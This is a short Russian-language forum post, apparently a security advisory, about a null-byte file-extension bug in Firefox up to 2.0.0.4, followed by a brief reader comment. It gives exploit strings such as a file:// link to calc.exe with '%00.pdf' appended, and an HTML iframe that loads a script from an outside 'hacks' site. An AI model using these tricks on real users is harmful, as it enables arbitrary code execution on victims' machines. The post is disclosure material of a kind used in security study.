Mozilla Firefox URLBar: выполнение произвольного кода. автор: 0х00000000 www.0x000000.com/?i=333 Цель: Mozilla Firefox практически всех версий. <=2.0.0.4 Опасность: 4/10 Exploit: В строке URL пишем: Code: file:///C:/winnt/system32/calc.exe%00.pdf или в теле html-документа используем ссылку вида: Code: <A HREF=file:///C:/winnt/system32/calc.exe%00.pdf>download</A> Общий вид эксплоита: [uri]/[filelocation]/[file][.ext1]%00[.ext2] - где между расширениями файла ext1 и ext2 вставлен терминирующий символ "%00" (нулевой байт - признак конца строки). Подробности: При открытии вредоносной ссылки Огненный Лис запутывается: он распознаёт этот файл как приложение (о чём честно пишет вверху) а ниже предлагает открыть этот файл как pdf-документ. Если уязвимое приложение самостоятельно сопоставляет тип файла с обрабатывающем приложением, то при попытке открытия файла calc.exe%00.pdf запустится, например Acrobat Reader и попробует открыть файл calc.exe, что у него естественно не получиться и вместо захвата управления мы увидим сообщение Акробата о не верном формате файла. А вот если файл открывается API-функциями ShellExecute/ShellExecuteEx, то сопаставление типа и расширения ложиться на плечи операционной системы и она послушно запускает calc.exe. Тут открываются возможности по выполнению произвольного javascript-сценария: например так: Code: file:///path/troy.txt%00.html а файл troy.txt%00.html может содержать например такой html-код: Code: <html> <iframe name="bla" src="http://www.you_site.com/hacks/?troy.js" width="100%" height="900"></iframe> </html> Защита: Внимательно смотрите на раширения файлов перед открытием. ЗЫ: Другие уязвимости FF: за подробностями на bugtrack.ru
Ну а что собственно удивляться. Вышла новая версия, и выкладывают дыры в старой. Так было и будет всегда, и не только для ФФ.